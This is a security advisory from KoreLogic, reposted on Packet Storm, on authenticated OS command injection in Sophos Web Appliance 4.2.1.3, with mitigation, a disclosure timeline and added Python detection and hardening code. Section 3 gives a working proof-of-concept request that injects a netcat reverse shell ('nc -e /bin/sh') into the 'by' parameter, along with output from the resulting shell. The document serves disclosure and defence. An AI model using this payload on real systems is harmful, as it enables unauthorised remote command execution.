Sophos Web Appliance 4.2.1.3 Remote Code Execution

Published: 04 Nov 2016. Reported by Matthew Bergin. Type: packetstorm. Source: packetstormsecurity.com

Sophos Web Appliance 4.2.1.3 Remote Code Execution advisory and mitigation

KL-001-2016-009 : Sophos Web Appliance Remote Code Execution  
  
Title: Sophos Web Appliance Remote Code Execution  
Advisory ID: KL-001-2016-009  
Publication Date: 2016.11.03  
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-009.txt  
  
  
1. Vulnerability Details  
  
Affected Vendor: Sophos  
Affected Product: Web Appliance  
Affected Version: v4.2.1.3  
Platform: Embedded Linux  
CWE Classification: CWE-78: Improper Neutralization of Special Elements  
used in an OS Command ('OS Command Injection'),  
CWE-88: Argument Injection or Modification  
Impact: Remote Code Execution  
Attack vector: HTTP  
  
2. Vulnerability Description  
  
An authenticated user of any privilege can execute arbitrary  
system commands as the non-root webserver user.  
  
3. Technical Description  
  
Multiple parameters to the web interface are unsafely handled and  
can be used to run operating system commands, such as:  
  
POST /index.php?c=logs HTTP/1.1  
Host: [redacted]  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0)  
Gecko/20100101 Firefox/46.0  
Accept: text/javascript, text/html, application/xml, text/xml, */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
DNT: 1  
X-Requested-With: XMLHttpRequest  
X-Prototype-Version: 1.6.1  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Content-Length: 305  
Connection: close  
  
  
STYLE=590fca17b230e8cdba0394cfa28ef2eb&period=today&xperiod=&sb_xperiod=xdays&startDate=&txt_time_start=12%3A00%20AM&endDate=&txt_time_end=11%3A59%20PM&txt_filter_user_timeline=test&action=search&by=user_timeline`nc%20-e%20/bin/sh%20[redacted]%209191`&search=test&sort=time&multiplier=1&start=&end=&direction=1  
  
HTTP/1.1 200 OK  
Date: Tue, 10 May 2016 15:35:05 GMT  
Server: Apache  
Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0,  
pre-check=0  
Pragma: no-cache  
X-Frame-Options: sameorigin  
X-Content-Type-Options: nosniff  
Connection: close  
Content-Type: text/html; charset=utf-8  
Content-Length: 207  
  
{"lastPage":1,"startTime":"2016\/05\/10 12:00 AM","endTime":"2016\/05\/10  
4:35  
PM","filter":"test","recordsDisplayed":0,"recordsTotal":0,"data":[],"startDateBeforeData":false,"earliestRecord":"1970\/01\/01"}  
  
--  
  
The vulnerable parameters are: by, request_id, and txt_filter_domain  
  
That request launches the following process on the SWA:  
  
1000 16851 0.0 0.0 2728 1040 ? S 15:43 0:00 sh -c  
/opt/perl/bin/salp-generate-report.pl --report=Filter --res=-  
--type=user_timeline`nc -e /bin/sh [redacted] 9191` --filter='dGVzdA=='  
--start='2016/05/10' --end='2016/05/10' --action=''  
--sid=590fca17b230e8cdba0394cfa28ef2eb  
  
From the shell launched via netcat:  
  
id;uname -a;uptime  
uid=1000(spiderman) gid=1000(spiderman)  
groups=1000(spiderman),16(cron),44(tproxyd),45(wdx)  
Linux please 3.2.57 #1 SMP Fri Feb 19 18:30:36 UTC 2016 i686 GNU/Linux  
15:52:34 up 4:26, 0 users, load average: 0.11, 0.12, 0.15  
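
The request and process listing above show the defect: the `by` value is interpolated verbatim into a `sh -c` string, so a backtick substitution runs before the report script does. The following is an added example, not KoreLogic's or Sophos's code, showing a detection check over decoded form bodies for the three parameters the advisory names, beside a hardened argv builder for the same report command (allowlisted `--type`, strict patterns, no shell). The sample bodies, the `ALLOWED_TYPES` set and the `build_report_argv` name are constructed for this example.

```python
import re
from urllib.parse import parse_qs

# Parameters the advisory names as unsafely handled in the SWA web interface.
VULNERABLE_PARAMS = ("by", "request_id", "txt_filter_domain")
# Allowlist for --type: "user_timeline" appears in the advisory; the set itself
# is an assumption for this example (the appliance's real list is not given).
ALLOWED_TYPES = frozenset({"user_timeline"})
# Characters that let a value break out of its argument inside "sh -c ...".
SHELL_META = re.compile(r"[`;|&<>\n]|\$\(")
SID_RE = re.compile(r"^[0-9a-f]{32}$")

# Constructed sample bodies: the benign one mirrors the advisory's search
# request; the hostile one carries a backtick substitution in "by" (the
# advisory's injection point), here with a harmless `id` instead of a shell.
BENIGN_BODY = ("period=today&txt_filter_user_timeline=test&action=search"
               "&by=user_timeline&search=test&sort=time&start=&end=")
HOSTILE_BODY = BENIGN_BODY.replace("by=user_timeline", "by=user_timeline%60id%60")


def find_injection_attempts(body: str) -> dict:
    """Decode a form body and return {param: value} for every vulnerable
    parameter whose value contains shell metacharacters (detection side)."""
    params = parse_qs(body, keep_blank_values=True)
    return {name: v for name in VULNERABLE_PARAMS
            for v in params.get(name, []) if SHELL_META.search(v)}


def build_report_argv(report_type: str, sid: str, filter_b64: str,
                      start: str, end: str) -> list:
    """Hardened counterpart of the sh -c string in section 3: validate each
    field against a strict pattern and return an argv list meant for
    subprocess.run(argv) with shell=False, so no value is parsed by sh."""
    if report_type not in ALLOWED_TYPES:
        raise ValueError(f"unexpected report type: {report_type!r}")
    if not SID_RE.match(sid):
        raise ValueError("session id must be 32 hex characters")
    if not re.fullmatch(r"[A-Za-z0-9+/=]*", filter_b64):
        raise ValueError("filter must be base64 (the script already expects it)")
    for d in (start, end):
        if not re.fullmatch(r"\d{4}/\d{2}/\d{2}", d):
            raise ValueError(f"bad date: {d!r}")
    return ["/opt/perl/bin/salp-generate-report.pl", "--report=Filter", "--res=-",
            f"--type={report_type}", f"--filter={filter_b64}",
            f"--start={start}", f"--end={end}", "--action=", f"--sid={sid}"]
```

Even with the argv form, the allowlist on `--type` is what matters most: the script's own argument parser is the next interpreter in line, so values should match a known shape rather than merely avoid shell characters.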
  
4. Mitigation and Remediation Recommendation  
  
The vendor has issued a fix for this vulnerability in Version  
4.3 of SWA. Release notes available at:  
  
http://swa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.html  
  
5. Credit  
  
This vulnerability was discovered by Matt Bergin (@thatguylevel)  
of KoreLogic, Inc.  
  
6. Disclosure Timeline  
  
2016.09.09 - KoreLogic sends vulnerability report and PoC to Sophos  
2016.09.14 - Sophos requests KoreLogic re-send vulnerability details.  
2016.09.28 - KoreLogic requests status update.  
2016.09.28 - Sophos informs KoreLogic that an update including a fix  
for this vulnerability will be available near the end  
of October.  
2016.10.13 - Sophos informs KoreLogic that the update was released to a  
limited customer base and is expected to be distributed  
at-large over the following week.  
2016.11.03 - Public disclosure.  
  
7. Proof of Concept  
  
See 3. Technical Description.  
  
  
The contents of this advisory are copyright(c) 2016  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/  
  
KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html  
  
Our public vulnerability disclosure policy is available at:  
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt  
  
